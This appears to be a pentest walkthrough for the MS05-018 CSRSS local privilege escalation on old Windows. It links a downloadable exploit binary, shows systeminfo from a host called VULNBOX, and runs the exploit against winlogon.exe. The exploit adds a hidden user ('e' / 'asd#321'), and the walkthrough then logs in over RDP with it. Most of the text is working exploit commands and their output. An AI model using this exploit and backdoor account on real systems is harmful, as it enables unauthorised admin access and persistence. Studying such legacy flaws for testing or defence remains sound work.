MS05-018
MS05-018
Works for Windows 2K SP3/4 | Windows XP SP1/2
Download ms05-018.exe:
https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/提权工具/windows提权工具/MS05018—CSRSS.EXE漏洞利用/MS05018—CSRSS.EXE漏洞利用/tool
C:WINDOWSsystem32>systeminfo
systeminfo
Host Name: VULNBOX
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 1 Build 2600
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:WINDOWS
System Directory: C:WINDOWSSystem32
Boot Device: DeviceHarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB893803v2 - Update
C:Inetpubwwwroot>MS05-018.exe
ms5.exe
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net
Usage: ms5.exe pid
[+] PID=440 Process=winlogon.exe
C:Inetpubwwwroot>MS05-018.exe 440
ms5.exe 440
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net
[+] FreeConsole ok.
[+] AllocConsole ok.
[+] Get Console Title OK:"ms5.exe 440"
[+] bingo! found hwnd=70038
[+] start search "FF E4" in ntdll.dll
[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]
[+] CreateFileMapping OK!
[+] MapViewOfFile OK!
[+] Send Exploit!
[+] Done.
It's will successful add user :
username=e
password=asd#321
root@kali:~# rdesktop -u e -p asd#321 x.x.x.x